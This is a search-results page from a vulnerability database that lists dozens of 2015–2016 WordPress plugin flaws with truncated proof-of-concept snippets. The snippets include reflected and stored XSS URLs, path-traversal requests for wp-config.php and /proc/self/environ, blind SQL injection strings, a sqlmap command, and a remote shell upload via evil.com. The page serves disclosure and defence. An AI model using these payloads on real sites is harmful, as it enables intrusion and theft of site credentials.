Lucene search
K
WpexploitRecent

4359 matches found

wpexploit
wpexploit
•added 2016/07/19 12:0 a.m.•13 views

Form Lightbox - Arbitrary Option Update Leading to Admin Account

This is a plugin that is no longer in the WordPress repository, however, is still in use on some sites. With this vulnerability an attacker can update any option in the WordPress database. This includes gaining an admin access. Using the file ajax.php that contains the following line: updateoptio...

0.4AI score
Exploits0References2
wpexploit
wpexploit
•added 2016/07/18 12:0 a.m.•29 views

Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)

User agent strings are logged when requesting downloads that are processed by dwnldr and displayed back to the admin with no encoding, allowing for scripts to be stored and executed. curl -A "User-Agent: alertdocument.cookie;" -O http:///?attachmentid=...

4.3CVSS0.4AI score0.0102EPSS
Exploits2References1
wpexploit
wpexploit
•added 2016/07/03 12:0 a.m.•12 views

Real3D FlipBook <= 2.8 - Multiple Vulnerabilities

List of vulnerabilities: - Delete any file or directory from the server Unauthenticated - Upload images in Root directory Unauthenticated - Cross-Site Scripting XSS + POCExploit CodeCanyon Real3D FlipBook WordPress Plugin + http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587 +...

0.3AI score
Exploits0References3
wpexploit
wpexploit
•added 2016/06/22 12:0 a.m.•57 views

Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download

The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. Upload: The following file...

1.8AI score
Exploits0References3
wpexploit
wpexploit
•added 2016/06/22 12:0 a.m.•15 views

Contus Video Comments - Unauthenticated Remote JPG File Upload

The contus-video-comments WordPress plugin was affected by an Unauthenticated Remote JPG File Upload security vulnerability. curl --data @image.jpg "http://www.example.com/wp-content/plugins/contus-video-comments/save.php?id=../image"...

1.7AI score
Exploits0References1
wpexploit
wpexploit
•added 2016/06/09 12:0 a.m.•12 views

CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)

An Stored Cross Site Scripting was reported by the author to CM Ad Plugins under which an unprivileged user can trigger a Stored XSS to perform malicious actions or any attacker could send a crafted link CSRF which can trigger the Stored XSS. 1 Go to CM Ad changers - Campaigns 2 Create a Campaign...

0.2AI score
Exploits0References1
wpexploit
wpexploit
•added 2016/06/03 12:0 a.m.•11 views

WP Mobile Detector <= 3.5 - Arbitrary File Upload

The wp-mobile-detector WordPress plugin was affected by an Arbitrary File Upload security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php...

1.4AI score
Exploits0References3
wpexploit
wpexploit
•added 2016/05/31 12:0 a.m.•16 views

Stream <= 3.0.5 - Unauthenticated Events Export

The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version...

1.8AI score
Exploits0References1
wpexploit
wpexploit
•added 2016/05/20 12:0 a.m.•20 views

brafton WordPress Plugin <=3.4.7 - Reflected XSS

Title -brafton WordPress Plugin XSS Exploit Title : Vulnerabilitie XSS in brafton WordPress Plugin Date: Fri May 20 2016 Reported Date : Fri May 20 2016 Vendor Homepage: http://www.brafton.com/support/wordpress/ Version: v3.3.10 – January2016 Software Link:...

4.3CVSS6.3AI score0.0197EPSS
Exploits2References5
wpexploit
wpexploit
•added 2016/05/11 12:0 a.m.•19 views

Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)

The tera-charts WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://www.example.com/tera-charts/charts/treemap.php?fn=";alert1;"&userid=1...

4.3CVSS1.1AI score0.02177EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/05/06 12:0 a.m.•22 views

safe-editor <= 1.1 - Unauthenticated CSS/JS-injection

When saving JS/CSS in this plugin then both private and public ajax-hooks are being used. Because of this anyone can post JS/CSS that are saved to the db and printed to the head and footer portion of the page. In the file "index.php" in root folder on line 188 and 189 you can see that both privat...

4.3CVSS6.3AI score0.01506EPSS
Exploits2References1
wpexploit
wpexploit
•added 2016/04/29 12:0 a.m.•14 views

Truemag Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)

The truemag WordPress theme was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://WP/?s="%20alertdocument.cookie...

4.3CVSS0.3AI score0.01252EPSS
Exploits2References3
wpexploit
wpexploit
•added 2016/04/25 12:0 a.m.•12 views

The Events Calendar <= 4.1.1 - Open Redirect

The problem is located in the "tribe-bar-view" parameter that can be used to redirect a user to an arbitrary website. Timeline 2016-04-04 : Initial contact with Modern Tribe 2016-04-05 : Modern Tribe confirms the report 2016-04-07 : Modern Tribe publishes a new version 4.1.1.1 that resolves the...

1.1AI score
Exploits0References1
wpexploit
wpexploit
•added 2016/04/13 12:0 a.m.•25 views

e-search <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The e-search WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/e-search/tmpl/dateselect.php?date-from="alert1;alert1;"...

4.3CVSS0.9AI score0.0465EPSS
Exploits3References3
wpexploit
wpexploit
•added 2016/04/13 12:0 a.m.•18 views

WHIZZ <= 1.0.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The WHIZZ WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="alert1;"...

4.3CVSS1.1AI score0.03432EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/13 12:0 a.m.•24 views

Admin Font Editor <= 1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The admin-font-editor WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/admin-font-editor/css.php?size="alert1;"...

4.3CVSS0.9AI score0.03223EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•20 views

Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The tidio-gallery WordPress plugin was affected by a Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="alert1;"...

4.3CVSS1AI score0.04486EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•19 views

anti-plagiarism <= 3.60 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The anti-plagiarism WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/anti-plagiarism/js.php?m="alert1;"...

4.3CVSS0.9AI score0.04195EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•16 views

MiniMax <= 2.0.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The page-layout-builder WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layoutsettingsid="alert1;"...

4.3CVSS0.9AI score0.03462EPSS
Exploits2References1
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•20 views

defa-online-image-protector <= 3.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The defa-online-image-protector WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/defa-online-image-protector/redirect.php?r="alert1;"...

4.3CVSS0.9AI score0.03236EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•26 views

S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The s3-video WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/s3-video/views/video-management/previewvideo.php?media="alert1;"...

4.3CVSS1.4AI score0.03209EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•15 views

Easy Contact Form Builder <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The tidio-form WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/tidio-form/popup-insert-help.php?formId="alert1;"...

4.3CVSS1AI score0.04173EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•18 views

Hero Maps Pro <= 2.1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The hero-maps-pro WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="alert1;"...

4.3CVSS0.5AI score0.04448EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•20 views

AJAX Random Post <= 2.00 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The ajax-random-post WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/ajax-random-post/js.php?interval="alert1;"...

4.3CVSS0.9AI score0.03223EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•19 views

HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist="alert1;alert1;"...

4.3CVSS0.8AI score0.0465EPSS
Exploits3References3
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•18 views

Infusionsoft Gravity Forms Add-on <= 1.5.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="alert1;"...

4.3CVSS0.9AI score0.04195EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•27 views

WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The WPSOLR - Elasticsearch and Solr search WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability...

4.3CVSS0.4AI score0.04486EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•19 views

MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/parsi-font/css.php?size="alert1;"...

4.3CVSS0.8AI score0.04448EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•19 views

New Year Firework <= 1.1.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The new-year-firework WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/new-year-firework/firework/index.php?text="alert1;"...

4.3CVSS0.8AI score0.03432EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/12 12:0 a.m.•13 views

Indexisto WordPress Site Search <= 1.0.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The indexisto WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexistoindex="alert1;"...

4.3CVSS1.1AI score0.03432EPSS
Exploits2References2
wpexploit
wpexploit
•added 2016/04/08 12:0 a.m.•14 views

WP Multiple Meta Box 1.0 - Authenticated Blind SQL Injection

The multi-meta-box WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. http://www.example.com/wp-admin/admin.php?page=multimetaboxlisting&action=edit&id=1 AND SELECT FROM SELECTSLEEP5Etmx...

1.6AI score
Exploits0References2
wpexploit
wpexploit
•added 2016/04/01 12:0 a.m.•20 views

Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass

Using the plugin "Stop User Enumeration 1.3.3" is possible bypass it to get the usernames. Blocked: http://www.example.com/?author%00=%001 Passed: http://www.example.com/?bypass=1&author%00=1...

0.9AI score
Exploits0References2
wpexploit
wpexploit
•added 2016/04/01 12:0 a.m.•26 views

Cerber Limit Login Attempts <= 2.0.1.6 - Unauthenticated Stored XSS

If the option "I'm behind a proxy" is enabled, the visitor IP is read from X-Forwarded-For header, stored & printed in the admin panel without any sanitization / validation. Set the X-Forwarded-For header to alert1, and perform an incorrect login...

4.3CVSS0.3AI score0.01418EPSS
Exploits2References1
wpexploit
wpexploit
•added 2016/03/23 12:0 a.m.•11 views

Anti-Malware Security & Brute-Force Firewall <= 4.15.42 - XSS & CSRF

The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a XSS & CSRF security vulnerability. XSS vulnerability in https://wordpress.org/plugins/gotmls/ has been identified. While I scan a site with that plugin , i had a file '".png and it was skippped , but result was...

0.5AI score
Exploits0References1
wpexploit
wpexploit
•added 2016/03/22 12:0 a.m.•9 views

Memphis Document Library Plugin <= 3.1.5 - Arbitrary File Download

The function "mdocsimgpreview" is in charge of downloading image previews previously uploaded by the administrator, but it does not sanitize the file path being downloaded, thus, allowing to download arbitrary files in the file system. The vulnerable GET parameter is "mdocs-img-preview". The...

0.9AI score
Exploits0References1
wpexploit
wpexploit
•added 2016/03/21 12:0 a.m.•9 views

ABtest - File Inclusion

The abtest WordPress plugin was affected by a File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/abtest/abtestadmin.php?action=../../../../../../../../../../../../../../../proc/self/environ%00...

2.4AI score
Exploits0References2
wpexploit
wpexploit
•added 2016/03/15 12:0 a.m.•21 views

Nextend Facebook Connect <= 1.5.7 - Cross-Site Request Forgery (CSRF)

The Nextend Social Login and Register WordPress plugin was affected by a Cross-Site Request Forgery CSRF security vulnerability...

2.2AI score
Exploits0References1
wpexploit
wpexploit
•added 2016/03/07 12:0 a.m.•23 views

Ocim MP3 Plugin - Unauthenticated Reflected Cross-Site Scripting (XSS)

Credits to : Soufiane Boussali http://www.example.com/wp-content/plugins/ocim-mp3/source/pages.php?id=XSSPayload...

4.3CVSS1.5AI score0.00943EPSS
Exploits2References1
wpexploit
wpexploit
•added 2016/02/07 12:0 a.m.•19 views

InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)

Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user's browser and potentially compromise the WordPress installation...

4.3CVSS2.2AI score0.0102EPSS
Exploits2References1
wpexploit
wpexploit
•added 2016/01/28 12:0 a.m.•18 views

Sola Support Ticket <= 3.12 - XSS & Configuration Change

Any logged in user with any role and access to wp-admin in any way can update plugin settings including allowing HTML to be parsed. One can also change any notification messages to include JS which then can be used to obtain information by forgery. Make POST request to /wp-admin with parameters...

3.5CVSS0.5AI score0.00783EPSS
Exploits2References1
wpexploit
wpexploit
•added 2016/01/27 12:0 a.m.•23 views

IMPress Listings <= 2.0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The IMPress Listings WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. IMPress Listings XSS Demo alertdocument.cookie;...

4.3CVSS0.4AI score0.00985EPSS
Exploits1References1
wpexploit
wpexploit
•added 2016/01/13 12:0 a.m.•11 views

Commentator <= 2.5.2 - Reflected Cross-Site Scripting (XSS)

The commentator WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=commentatorsocialsignin&provider=facebook"...

1AI score
Exploits0References3
wpexploit
wpexploit
•added 2016/01/06 12:0 a.m.•36 views

WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)

http://www.example.com/wp-admin/customize.php?theme= source: https://twitter.com/brutelogic/status/685105483397619713...

4.3CVSS1AI score0.02694EPSS
Exploits2References2
wpexploit
wpexploit
•added 2015/12/09 12:0 a.m.•15 views

YAWPP <= 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

The yawpp WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. POST /wordpress-4.3/?p=4 HTTP/1.1 Host: wp.lab User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.10; rv:42.0 Gecko/20100101 Firefox/42.0 Accept:...

4.3CVSS0.4AI score0.01321EPSS
Exploits1References1
wpexploit
wpexploit
•added 2015/12/04 12:0 a.m.•9 views

Advanced uploader - Local File Inclusion

The Advanced uploader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00...

1.6AI score
Exploits0References1
wpexploit
wpexploit
•added 2015/11/26 12:0 a.m.•15 views

Auto ThickBox Plus <= 1.9 - Reflected Cross-Site Scripting (XSS)

The auto-thickbox-plus WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/auto-thickbox-plus/download.min.php?file=%3Cscript%3Ealert%281%29%3C/script%3E...

4.3CVSS1.1AI score0.00985EPSS
Exploits1References1
wpexploit
wpexploit
•added 2015/11/12 12:0 a.m.•22 views

WP Fastest Cache <= 0.8.4.8 - Blind SQL Injection

According to the researcher, for this vulnerability to be present WP-Polls plugin also needs to be installed...

7.5CVSS0.5AI score0.02987EPSS
Exploits2References1
wpexploit
wpexploit
•added 2015/10/29 12:0 a.m.•23 views

WordPress File Upload <= 3.4.0 - Unauthenticated Malicious File Upload

The WordPress plugin wp-file-upload does not adequately check the filetype before allowing it to be uploaded. It also uploaded files with execute permissions, allowing malicious payloads to be uploaded. 1. Install wp-file-upload on a WordPress site and activate it. 2. Create an upload form on a...

5CVSS0.6AI score0.01389EPSS
Exploits1References1
wpexploit
wpexploit
•added 2015/10/23 12:0 a.m.•20 views

wp-championship <= 5.8 - Authenticated Blind SQL Injection

The wp-championship WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. $ sqlmap -u 'http://www.example.com/wp-admin/wp-championship/csadminusers.php&userid=' --data="isadmin=1&user" --cookie=AUTHCOOKIEHERE --level=5 --risk=3...

7.5CVSS2.1AI score0.02206EPSS
Exploits2References1
wpexploit
wpexploit
•added 2015/10/19 12:0 a.m.•13 views

Recent Posts Widget Extended <= 0.9.9.3 - Authenticated XSS (multisite)

XSS in the Recent Posts Widget Extended plugin allows single site admins to change network admin's password with simple CSRF described above POC field. This vulnerability is currently unpatched. 1. Login as single site administrator 2. Add Recent Posts Extended Widget to some widget area 3. Add...

0.3AI score
Exploits0References2
Total number of security vulnerabilities4359